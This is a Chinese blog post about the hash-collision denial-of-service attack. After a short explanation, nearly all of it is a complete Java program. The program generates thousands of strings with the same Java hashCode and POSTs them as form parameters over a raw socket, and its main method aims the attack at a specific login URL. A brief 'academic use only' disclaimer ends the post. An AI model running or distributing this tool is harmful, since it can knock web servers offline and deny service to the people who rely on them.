Hash Collision DoS代码

最近看Web安全,看到最近这篇文章:Hash Collision DoS 问题

原理很简单,利用现有语言服务器的hash code实现缺陷,构造大量hash code相等的字符串,做成post的参数,让服务器忙于创建和查询hash map,从而是服务器拒绝服务。详细描述可以看上面那篇文章。

我试着写了个攻击的例子代码:

import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.IOException;
import java.io.OutputStreamWriter;
import java.net.MalformedURLException;
import java.net.Socket;
import java.net.URL;
import java.util.ArrayList;
import java.util.List;

public class HashCollisionDosAttack {
	private final String[] srcs= {"Aa", "BB"};

	private List<String> getStrings(int n) {
		List<String> strlist = new ArrayList<String>();

		int round = (int) Math.pow(2, n);
		for (int i = 0; i < round; ++i) {
			strlist.add(getString(i, n));
		}
		return strlist;
	}

	private String getString(int index, int n) {
		String str = "";
		int[] bytes = getBytesOf(index, n);
		for (int i = 0; i < bytes.length; ++i) {
			str += srcs[bytes[i]];
		}
		return str;
	}

	private int[] getBytesOf(int index, int n) {
		int[] bytes = new int[n];
		for (int i = 0; i < n; ++i) {
			bytes[n - i - 1] = 1 & (index >> i);
		}
		return bytes;
	}

	private void post(URL url, String params) {
		Socket socket = null;
		BufferedWriter bw = null;
		BufferedReader br= null;
		try {
			socket = new Socket(url.getHost(), url.getPort());
			bw = new BufferedWriter(new OutputStreamWriter(socket.getOutputStream()));
			bw.write("POST " + url.getPath() + " HTTP/1.1\r\n");
			bw.write("Host: " + url.getHost() + "\r\n");
			bw.write("Content-Type: application/x-www-form-urlencoded\r\n");
			bw.write("Content-Length: " + params.length() + "\r\n");
			bw.write("Connection: Keep-Alive\r\n");
			bw.write("\r\n");
			bw.write(params);
			bw.flush();

//	      br = new BufferedReader(new InputStreamReader(socket.getInputStream(),"UTF-8"));
//	      String line;
//          while ((line = br.readLine()) != null) {
//            System.out.println(line);
//          }

//          System.out.println(params);
		} catch (Exception e) {
			e.printStackTrace();
		} finally {
			if (null != socket) {
				try {
					socket.close();
				} catch (IOException e) {
					e.printStackTrace();
				}
			}

			if (null != bw) {
				try {
					bw.close();
				} catch (IOException e) {
					e.printStackTrace();
				}
			}
			if (null != br) {
				try {
					br.close();
				} catch (IOException e) {
					e.printStackTrace();
				}
			}
		}
	}

	public void attack(String urlStr, int n) throws MalformedURLException {
		String params = "";
		for (int i = 1; i <= n; ++i) {
			params += buildParams(getStrings(i));
		}

		URL url = new URL(urlStr);
		post(url, params);
	}

	private String buildParams(List<String> strings) {
		String params = "";
		for (String str : strings) {
			params += str + "=x&";
			params.hashCode();
		}
		return params;
	}

	public static void main(String[] args) throws MalformedURLException {
		HashCollisionDosAttack attack = new HashCollisionDosAttack();
		attack.attack("http://frigile.com/login/login.htm", 15);
	}
}

 仅作学术交流,请勿用于非法目的。

你可能感兴趣的:(Web,dos,Security,hash,colllision)